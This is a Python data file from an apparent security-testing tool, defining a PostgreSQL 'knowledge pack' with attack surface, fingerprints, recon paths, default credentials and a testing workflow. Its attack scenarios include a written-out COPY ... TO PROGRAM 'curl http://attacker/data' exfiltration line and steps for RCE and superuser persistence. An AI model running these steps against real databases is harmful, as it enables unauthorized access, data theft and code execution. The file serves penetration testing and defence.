"""PostgreSQL knowledge pack."""
from deephunter.core.types import AttackSurfaceEntry, BusinessLogicConcern, BugClass, ManualTestChecklistItem, TrustBoundary
from deephunter.knowledge.packs.base import AttackSurfaceProfile, FingerprintProfile, KnowledgePack, KnowledgePackCategory, KnowledgeRelationship, KnowledgeRelationshipType, ReconProfile, TechnologyComponentProfile, TechnologyProfile

PACK = KnowledgePack(
    name="postgresql",
    version="1.0.0",
    category=KnowledgePackCategory.DATABASE,
    description="PostgreSQL — unauthenticated database access, weak/default credentials (postgres:postgres), SQL injection, exposed port 5432, pg_hba.conf misconfiguration, backup file leaks (pg_dump SQL files), admin interface exposure (pgAdmin), trust authentication bypass, PostgreSQL specific SQLi with stacked queries, COPY FROM PROGRAM RCE, dblink extension abuse, and large object exploitation.",
    technology=TechnologyProfile(
        name="PostgreSQL",
        vendor="PostgreSQL Global Development Group",
        language="C",
        runtime="PostgreSQL Server",
        description="PostgreSQL is a powerful, open-source object-relational database system with over 30 years of active development. Known for reliability, feature robustness, and performance. Supports ACID transactions, MVCC, foreign keys, joins, views, triggers, stored procedures (PL/pgSQL, PL/Python, PL/Perl), and extensive indexing.",
        common_aliases=["postgresql", "postgres", "pgsql", "postgre"],
        dependencies=["libpq (client library)", "psycopg2 (Python)", "pg gem (Ruby)", "postgresql-client (CLI)"],
        common_integrations=["pgAdmin", "psql", "DBeaver", "DataGrip", "TablePlus", "PostGIS", "TimescaleDB", "Citus (distributed)", "PgBouncer (connection pooler)", "Patroni (HA)", "Repmgr (replication)", "WAL-G (backup)", "Liquibase", "Flyway", "Django", "Ruby on Rails", "Laravel", "Spring Boot", "Hasura GraphQL"],
        architecture_description="Client-server architecture. A PostgreSQL cluster consists of one or more databases managed by a single postmaster (postgres) process. Each client connects via TCP (port 5432) or Unix socket. Authentication is configured via pg_hba.conf. Role-based access control with GRANT/REVOKE.",
        request_lifecycle="Client -> psql/libpq -> TCP connection (port 5432) -> TLS negotiation -> SASL/password auth -> Query execution -> Response",
        documentation_url="https://www.postgresql.org/docs/",
        tags=["database", "sql", "relational", "open-source", "rdbms", "postgres"],
    ),
    components=[
        TechnologyComponentProfile(
            name="PostgreSQL Server (postmaster)",
            description="Main database server process listening on port 5432 (default). Authenticates clients, executes queries, manages transactions and concurrency.",
            security_relevance="high",
            common_vulnerabilities=["Unauthenticated access due to trust authentication in pg_hba.conf", "Weak/default credentials (postgres:postgres)", "Exposed port 5432 to public internet", "Remote command execution via COPY FROM PROGRAM", "Denial of service via connection exhaustion", "Unsecured replication (wal_level, streaming replication)"],
            investigation_priority=95,
            tags=["server", "port-5432", "auth", "postmaster"],
        ),
        TechnologyComponentProfile(
            name="pg_hba.conf",
            description="Host-Based Authentication configuration file controlling client authentication methods per IP range, database, and user.",
            security_relevance="high",
            common_vulnerabilities=["trust authentication for all hosts", "md5/scram-sha-256 not enforced", "IPv4 0.0.0.0/0 allowed", "All databases accessible with single auth method", "Same user mapping for all databases"],
            investigation_priority=95,
            tags=["auth", "pg_hba", "configuration", "access-control"],
        ),
        TechnologyComponentProfile(
            name="PostgreSQL SQL Interface",
            description="SQL parsing and execution engine. Vulnerable to SQL injection, input validation errors, and PL/pgSQL stored procedure abuse.",
            security_relevance="high",
            common_vulnerabilities=["SQL injection in web applications querying PostgreSQL", "Stacked queries in PostgreSQL (multi-statement execution)", "PL/pgSQL injection via EXECUTE with concatenated input", "Large object exploitation (lo_import, lo_export)", "dblink extension abuse for cross-database queries", "Unicode/encoding-based SQLi bypass"],
            investigation_priority=95,
            tags=["sql", "injection", "plpgsql", "query", "input-validation"],
        ),
        TechnologyComponentProfile(
            name="COPY FROM PROGRAM",
            description="PostgreSQL COPY command with PROGRAM option to execute shell commands on the server. Requires superuser privileges.",
            security_relevance="high",
            common_vulnerabilities=["Remote command execution via COPY ... FROM PROGRAM", "Privilege escalation to superuser via SQLi to execute COPY FROM PROGRAM", "Data exfiltration via COPY TO PROGRAM"],
            investigation_priority=95,
            tags=["copy", "rce", "program", "command-execution", "superuser"],
        ),
        TechnologyComponentProfile(
            name="pgAdmin",
            description="Web-based administration tool for PostgreSQL. Exposed admin interface with default credentials and session misconfiguration.",
            security_relevance="high",
            common_vulnerabilities=["pgAdmin exposed without authentication", "Default pgAdmin credentials (pgadmin4@pgadmin.org:admin)", "pgAdmin session cookie without HttpOnly/Secure flags", "pgAdmin server-side request forgery (SSRF) via dashboard", "pgAdmin backup/restore feature exposing data"],
            investigation_priority=85,
            tags=["pgadmin", "admin-interface", "web-ui", "management"],
        ),
        TechnologyComponentProfile(
            name="PostgreSQL Extensions",
            description="Extensible module system including dblink, postgres_fdw, file_fdw, pgcrypto, uuid-ossp, and PL languages. Insecure extensions can expose data and enable attacks.",
            security_relevance="medium",
            common_vulnerabilities=["dblink allowing cross-database authentication bypass", "file_fdw reading arbitrary files from server filesystem", "pl/pythonu untrusted language allowing code execution", "pgcrypto weakness with outdated algorithms", "Unused extensions bloating attack surface"],
            investigation_priority=80,
            tags=["extensions", "modules", "dblink", "fdw", "pl"],
        ),
        TechnologyComponentProfile(
            name="Backup Files / Dumps",
            description="pg_dump and pg_dumpall output files (.sql, .dump, .tar, .custom) containing schema, data, and potentially credentials.",
            security_relevance="high",
            common_vulnerabilities=["pg_dump files left in web-accessible directories", "Automated backup files in S3/Blob/GCS buckets with public access", "Backup files containing plaintext passwords", "Unencrypted backup files in transit or storage", "Backup cron job output world-readable"],
            investigation_priority=85,
            tags=["backup", "dump", "pg_dump", "leakage", "data-exposure"],
        ),
    ],
    attack_surface=AttackSurfaceProfile(
        entry_points=[
            AttackSurfaceEntry(
                name="PostgreSQL TCP Port",
                description="Default PostgreSQL port exposed to network",
                protocol="TCP",
                method="N/A",
                path="tcp://{host}:5432",
                parameters=[],
                authentication_required=True,
                authorization_required=True,
                bug_classes=[BugClass.AUTH_BYPASS.value, BugClass.INFO_DISCLOSURE.value],
            ),
            AttackSurfaceEntry(
                name="PostgreSQL Client Connection",
                description="PostgreSQL wire protocol connection accepting SQL queries",
                protocol="TCP",
                method="N/A",
                path="tcp://{host}:{port}/{database}",
                parameters=["sslmode", "connect_timeout"],
                authentication_required=True,
                authorization_required=True,
                bug_classes=[BugClass.SQL_INJECTION.value, BugClass.RCE.value, BugClass.AUTH_BYPASS.value],
            ),
            AttackSurfaceEntry(
                name="pgAdmin Web Interface",
                description="Web-based PostgreSQL administration tool",
                protocol="HTTPS",
                method="ANY",
                path="/pgadmin4/",
                parameters=[],
                authentication_required=True,
                authorization_required=False,
                bug_classes=[BugClass.AUTH_BYPASS.value, BugClass.SSRF.value],
            ),
            AttackSurfaceEntry(
                name="PostgreSQL Backup File",
                description="pg_dump SQL/dump file accessible via HTTP",
                protocol="HTTPS/HTTP",
                method="GET",
                path="/backup/{database}.sql",
                parameters=[],
                authentication_required=False,
                authorization_required=False,
                bug_classes=[BugClass.INFO_DISCLOSURE.value],
            ),
            AttackSurfaceEntry(
                name="PostgreSQL Replication",
                description="Streaming replication slot accessible for data extraction",
                protocol="TCP",
                method="N/A",
                path="tcp://{host}:5432?replication=database",
                parameters=["replication"],
                authentication_required=True,
                authorization_required=True,
                bug_classes=[BugClass.INFO_DISCLOSURE.value, BugClass.AUTH_BYPASS.value],
            ),
        ],
        endpoints=["tcp://{host}:5432", "tcp://{host}:5433", "tcp://{host}:54320", "tcp://{host}:6432 (PgBouncer)", "https://{host}/pgadmin4/", "https://{host}/pga/", "https://{host}/backup/{db}.sql", "https://{host}/{db}.dump", "https://{host}/{db}.backup"],
        parameters=["sslmode", "sslcert", "sslkey", "sslrootcert", "connect_timeout", "application_name", "options", "statement_timeout", "lock_timeout", "search_path"],
        authentication=["password (plaintext over TLS)", "md5 (salted challenge-response)", "scram-sha-256 (recommended)", "trust (no auth -- dangerous)", "cert (client TLS certificate)", "gss (Kerberos)", "ident (system user mapping)", "peer (Unix socket user mapping)", "ldap", "radius", "pam"],
        authorization=["Roles (LOGIN, SUPERUSER, CREATEDB, CREATEROLE)", "GRANT/REVOKE on tables, schemas, databases", "Row-Level Security (RLS) policies", "Column-level privileges", "Schema-level privileges (USAGE, CREATE)", "Default privileges on new objects"],
        storage=["Tablespaces (filesystem directories)", "WAL (Write-Ahead Log)", "pg_xlog/pg_wal", "pg_data directory", "Toast tables (large attribute storage)", "Indexes (B-tree, Hash, GiST, GIN, SP-GiST, BRIN)"],
        background_jobs=["pg_stat_statements (query monitoring)", "Auto-vacuum (MVCC cleanup)", "Auto-analyze (statistics)", "pg_cron (scheduled jobs)", "Listen/Notify (async notifications)", "Logical replication (publish/subscribe)", "Background workers (custom extensions)"],
        queues=["Listen/Notify (LISTEN/NOTIFY channels)", "pgmq (external message queue extension)", "Logical replication slots (WAL-based streaming)"],
        caches=["shared_buffers (PostgreSQL buffer cache)", "wal_buffers (WAL write cache)", "effective_cache_size (OS cache estimate)", "pg_stat_statements (query plan cache)"],
        admin_interfaces=["psql (CLI)", "pgAdmin (Web)", "DBeaver", "DataGrip", "TablePlus", "OmniDB", "pg_dump / pg_restore (CLI)", "pg_lsclusters / pg_ctlcluster"],
        internal_apis=["PostgreSQL Wire Protocol (port 5432)", "Unix socket (/var/run/postgresql/.s.PGSQL.5432)"],
        external_apis=["PostgreSQL Wire Protocol (TCP)", "Connection pooling (PgBouncer, Pgpool-II)"],
        trust_boundaries=[
            TrustBoundary(name="Client-to-Database", description="Application or user connects to PostgreSQL via TCP or Unix socket", direction="inbound", sensitivity="high"),
            TrustBoundary(name="Database-to-Filesystem", description="PostgreSQL reads/writes data files, WAL, and temp files", direction="outbound", sensitivity="high"),
            TrustBoundary(name="Replication-Slot", description="Standby replicas connect to primary via replication protocol", direction="outbound", sensitivity="high"),
        ],
        attack_surface_areas=[
            "PostgreSQL port 5432 exposed to public internet",
            "pg_hba.conf with trust authentication allowing passwordless login",
            "Default postgres user with no password or weak password (postgres:postgres)",
            "SQL injection enabling data exfiltration, authentication bypass, and RCE",
            "COPY FROM PROGRAM RCE via SQL injection with superuser privileges",
            "pgAdmin web interface exposed without authentication or with default creds",
            "Backup files (.sql, .dump, .backup) accessible from web server or cloud storage",
            "PostgreSQL replication slot accessible allowing data exfiltration",
            "dblink extension allowing cross-database queries without proper auth",
            "Large object exploitation (lo_import, lo_export) reading/writing server files",
            "PL/pgSQL injection via EXECUTE with unsanitized user input",
            "Database superuser role granted to application database user",
        ],
        investigation_areas=[
            "Scan for open port 5432 (and alternate ports 5433, 54320, 6432)",
            "Attempt to connect with default credentials (postgres:postgres, postgres:admin)",
            "Test for trust authentication by connecting without password",
            "Check for accessible backup files (.sql, .dump, .backup, .tar.gz)",
            "Look for pgAdmin instances at /pgadmin4/, /pga/, /postgresql/",
            "Test for SQL injection in applications using PostgreSQL",
            "Attempt COPY FROM PROGRAM RCE if SQL injection yields superuser",
            "Check replication slot access by requesting WAL streaming",
            "Review pg_hba.conf for insecure authentication methods",
            "Check for large object attacks if SQL injection is present",
            "Test dblink extension for cross-database access",
            "Look for PostgreSQL connection strings and credentials in source code",
        ],
        tags=["postgresql", "postgres", "database", "sql", "rdbms"],
    ),
    fingerprints=FingerprintProfile(
        http_headers={
            "Server": "pgAdmin",
        },
        cookies=["pgAdmin-session", "pga"],
        js_indicators=["pgAdmin", "PostgreSQL", "pg_dump", "psycopg2"],
        file_indicators=[".sql (pg_dump)", ".dump", ".backup", "pg_hba.conf", "postgresql.conf", "pgpass", ".pgpass", "pg_hba.conf.sample", "postgresql.auto.conf", "recovery.conf", "standby.signal"],
        directory_indicators=["/var/lib/postgresql/", "/var/lib/postgresql/data/", "/etc/postgresql/", "/usr/share/postgresql/", "/backup/", "/dumps/"],
        server_signatures=["PostgreSQL", "pgAdmin", "postgres"],
        error_page_signatures=["PostgreSQL", "psql", "pg_dump", "pgAdmin", "FATAL:  password authentication failed", "FATAL:  no pg_hba.conf entry", "FATAL:  database does not exist", "ERROR:  relation does not exist", "psycopg2", "ProgrammingError", "UndefinedTable"],
        default_paths=["/pgadmin4/", "/pga/", "/postgresql/", "/phpPgAdmin/", "/backup/", "/dumps/", "/sql/"],
        default_files=["pg_hba.conf", "postgresql.conf", "pgpass", ".pgpass", "dump.sql", "backup.sql", "database.sql", "db.sql", "pg_dump.sql", "*.sql", "*.dump", "*.backup", "*.pgsql"],
        metadata_patterns={"postgres": "FATAL|ERROR|pgAdmin|PostgreSQL|psql"},
        tags=["fingerprint", "postgresql", "database"],
    ),
    recon=ReconProfile(
        directories_to_check=["/backup/", "/dumps/", "/sql/", "/database/", "/db/", "/pgadmin4/", "/pga/", "/postgresql/", "/phpPgAdmin/", "/var/lib/postgresql/", "/etc/postgresql/"],
        files_to_check=["dump.sql", "backup.sql", "database.sql", "db.sql", "pg_dump.sql", "pgpass", ".pgpass", "pg_hba.conf", "postgresql.conf", "connection.php", "database.php", "db.php", ".env", "config.php", "settings.php", "application.properties", "application.yml"],
        endpoints_to_scan=["tcp://{host}:5432", "tcp://{host}:5433", "tcp://{host}:54320", "https://{host}/pgadmin4/", "https://{host}/pga/", "https://{host}/backup/"],
        port_scan_targets=[5432, 5433, 54320, 6432, 54321, 54322, 54323],
        version_detection_paths=["/pgadmin4/", "/pga/"],
        debug_paths_to_check=["/pgadmin4/", "/debug/", "/pga/"],
        admin_paths_to_check=["/pgadmin4/", "/pga/", "/postgresql/", "/admin/", "/database/"],
        tags=["recon", "postgresql", "database"],
    ),
    business_logic_concerns=[
        BusinessLogicConcern(
            description="PostgreSQL exposed to public internet on port 5432 with weak or no authentication allows full database access",
            impact="Complete database compromise -- all data, schema, and server-side code (stored procedures) can be read, modified, or deleted",
            attack_scenario="Scan for port 5432; attempt connection with psql -h {host} -U postgres; try default/empty password; if trust auth, connect without any credentials; enumerate databases, tables, and extract all data",
            complexity="low",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="SQL injection vulnerability in application using PostgreSQL allows data theft, authentication bypass, and potentially RCE via COPY FROM PROGRAM",
            impact="Full database compromise and potential remote code execution on the database server -- all data can be exfiltrated, modified, or encrypted for ransom",
            attack_scenario="Find SQLi in web app parameter; extract database version and current user; if superuser, execute COPY (SELECT '') TO PROGRAM 'curl http://attacker/data' to exfiltrate; or COPY malicious_data FROM PROGRAM for RCE",
            complexity="medium",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="pgAdmin web interface exposed to the internet with default credentials or no authentication allows full database management",
            impact="Complete control over PostgreSQL instances managed through pgAdmin -- database creation, deletion, query execution, and server management",
            attack_scenario="Browse to /pgadmin4/; try default credentials (pgadmin4@pgadmin.org:admin); if successful, add the target PostgreSQL server and execute arbitrary SQL queries",
            complexity="low",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="PostgreSQL backup files (.sql dump) accessible from web server or public cloud storage expose entire database contents",
            impact="Complete data leakage -- all tables, user credentials, PII, financial data, and application secrets in plaintext SQL format",
            attack_scenario="Discover backup files via directory brute-force (/backup/, /dumps/, /sql/); download .sql files; parse with grep for INSERT statements, passwords, credit cards, and other sensitive data",
            complexity="low",
            requires_authentication=False,
        ),
        BusinessLogicConcern(
            description="pg_hba.conf configured with trust authentication for all hosts, allowing any network client to connect without credentials",
            impact="Unauthenticated access to PostgreSQL for anyone who can reach the port -- full read/write access to all databases",
            attack_scenario="Connect to PostgreSQL port without providing a password; enumerate databases and tables; extract or modify data; create new superuser role for persistence",
            complexity="low",
            requires_authentication=False,
        ),
    ],
    relationships=[
        KnowledgeRelationship(
            target_pack_name="mysql",
            relationship_type=KnowledgeRelationshipType.COMPETES_WITH,
            description="PostgreSQL and MySQL are competing open-source SQL databases",
            confidence="high",
        ),
        KnowledgeRelationship(
            target_pack_name="mongodb",
            relationship_type=KnowledgeRelationshipType.COMPETES_WITH,
            description="PostgreSQL and MongoDB are competing database types (SQL vs NoSQL)",
            confidence="high",
        ),
        KnowledgeRelationship(
            target_pack_name="django",
            relationship_type=KnowledgeRelationshipType.INTEGRATES_WITH,
            description="PostgreSQL is the preferred database for Django applications",
            confidence="high",
        ),
        KnowledgeRelationship(
            target_pack_name="rails",
            relationship_type=KnowledgeRelationshipType.INTEGRATES_WITH,
            description="PostgreSQL is commonly used with Ruby on Rails",
            confidence="high",
        ),
    ],
    dependencies=["libpq", "psycopg2", "pg gem", "postgresql-client"],
    related_packs=["mysql", "mongodb", "django", "rails", "laravel"],
    workflow=[
        "1. Scan for open PostgreSQL port 5432 (and alternate ports 5433, 54320, 6432)",
        "2. Attempt connection with default credentials (postgres:postgres, postgres:admin)",
        "3. Test for trust authentication by connecting without a password",
        "4. Enumerate databases, schemas, tables, and user roles if connected",
        "5. Check for accessible pgAdmin web interface at /pgadmin4/, /pga/",
        "6. Look for backup files (.sql, .dump, .backup, .tar.gz) in web-accessible directories",
        "7. Test web applications for SQL injection in PostgreSQL-backed endpoints",
        "8. If SQL injection found, attempt data extraction and COPY FROM PROGRAM RCE",
        "9. Look for connection strings and credentials in source code and config files",
        "10. Check for replication slot access if streaming replication is configured",
        "11. Attempt large object attacks (lo_import, lo_export) via SQL injection",
        "12. Check for dblink extension and cross-database access possibilities",
    ],
    checklists=[
        ManualTestChecklistItem(
            step_id="PG-01",
            category="Port Exposure",
            description="Check if PostgreSQL port 5432 is exposed to the internet or untrusted networks",
            expected_result="PostgreSQL should not be publicly accessible; use firewalls or SSH tunnels",
            tools=["nmap", "masscan", "shodan"],
            references=["https://www.postgresql.org/docs/current/auth-pg-hba-conf.html"],
        ),
        ManualTestChecklistItem(
            step_id="PG-02",
            category="Authentication Testing",
            description="Test PostgreSQL authentication with default and weak credentials",
            expected_result="Database should require strong authentication (scram-sha-256) and not use trust or md5",
            tools=["psql", "pg_hba.conf review"],
            references=["https://www.postgresql.org/docs/current/auth-methods.html"],
        ),
        ManualTestChecklistItem(
            step_id="PG-03",
            category="SQL Injection Testing",
            description="Test application endpoints for PostgreSQL SQL injection",
            expected_result="Application should use parameterized queries or prepared statements",
            tools=["sqlmap", "Burp Suite", "Postman"],
            references=["https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"],
        ),
        ManualTestChecklistItem(
            step_id="PG-04",
            category="Backup File Exposure",
            description="Search for publicly accessible PostgreSQL backup/dump files",
            expected_result="Backup files should not be accessible from web server or public storage",
            tools=["dirb", "gobuster", "ffuf", "Google dorks"],
            references=["https://www.postgresql.org/docs/current/backup.html"],
        ),
        ManualTestChecklistItem(
            step_id="PG-05",
            category="pgAdmin Exposure",
            description="Check for pgAdmin web interface exposed without authentication",
            expected_result="pgAdmin should require strong authentication and be restricted to trusted networks",
            tools=["browser", "curl", "nmap"],
            references=["https://www.pgadmin.org/docs/pgadmin4/latest/"],
        ),
        ManualTestChecklistItem(
            step_id="PG-06",
            category="COPY FROM PROGRAM RCE",
            description="Test if COPY FROM PROGRAM can be exploited via SQL injection for RCE",
            expected_result="Application database user should not have superuser privileges required for COPY FROM PROGRAM",
            tools=["sqlmap", "psql", "custom scripts"],
            references=["https://www.postgresql.org/docs/current/sql-copy.html"],
        ),
        ManualTestChecklistItem(
            step_id="PG-07",
            category="Large Object Attack",
            description="Test for large object exploitation via lo_import/lo_export",
            expected_result="Large object functions should be restricted to superuser only",
            tools=["psql", "custom scripts"],
            references=["https://www.postgresql.org/docs/current/lo-funcs.html"],
        ),
    ],
    references=[
        {"title": "PostgreSQL Documentation", "url": "https://www.postgresql.org/docs/"},
        {"title": "PostgreSQL Security Documentation", "url": "https://www.postgresql.org/docs/current/security.html"},
        {"title": "OWASP SQL Injection Cheat Sheet", "url": "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"},
        {"title": "HackTricks - PostgreSQL Pentesting", "url": "https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql"},
        {"title": "PostgreSQL Security Best Practices", "url": "https://www.postgresql.org/docs/current/auth-pg-hba-conf.html"},
        {"title": "CVE PostgreSQL Collection", "url": "https://www.cve.org/KeywordSearch?keyword=PostgreSQL"},
    ],
    cwe_ids=["CWE-306", "CWE-521", "CWE-89", "CWE-862", "CWE-200", "CWE-798", "CWE-284", "CWE-77"],
    cve_ids=["CVE-2023-2455", "CVE-2023-2454", "CVE-2023-2453", "CVE-2022-2625", "CVE-2022-1552", "CVE-2021-23222", "CVE-2021-23214", "CVE-2019-9193"],
    tags=["postgresql", "postgres", "database", "sql", "rdbms", "open-source"],
)
